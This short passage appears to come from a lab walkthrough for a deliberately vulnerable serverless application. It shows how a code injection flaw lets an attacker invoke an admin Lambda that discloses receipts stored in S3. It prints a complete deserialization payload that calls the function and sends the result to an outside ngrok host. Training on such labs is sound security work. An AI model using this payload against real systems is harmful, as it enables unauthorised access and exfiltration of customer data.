An attacker can leverage the code injection vulnerability to invoke an admin functionality that will disclose all the receipts from the S3 bucket.
Sending the following payload will invoke an admin function that will pack all the receipts within the specified year and month and will created a signed url to download them.
{"action": "_$$ND_FUNC$$_function(){var aws=require(\"aws-sdk\");var lambda=new aws.Lambda();var p = {FunctionName: \"DVSA-ADMIN-GET-RECEIPT\", InvocationType: \"RequestResponse\", Payload: JSON.stringify({\"year\": \"2018\", \"month\": \"12\"})};lambda.invoke(p,function(e,d){ var h=require(\"http\");h.get(\"http://0c971764.ngrok.io/lol?data=\"+JSON.stringify(d));}); }()"}
As a result:
Pasting the url in the browser will download the receipts from the S3 bucket:
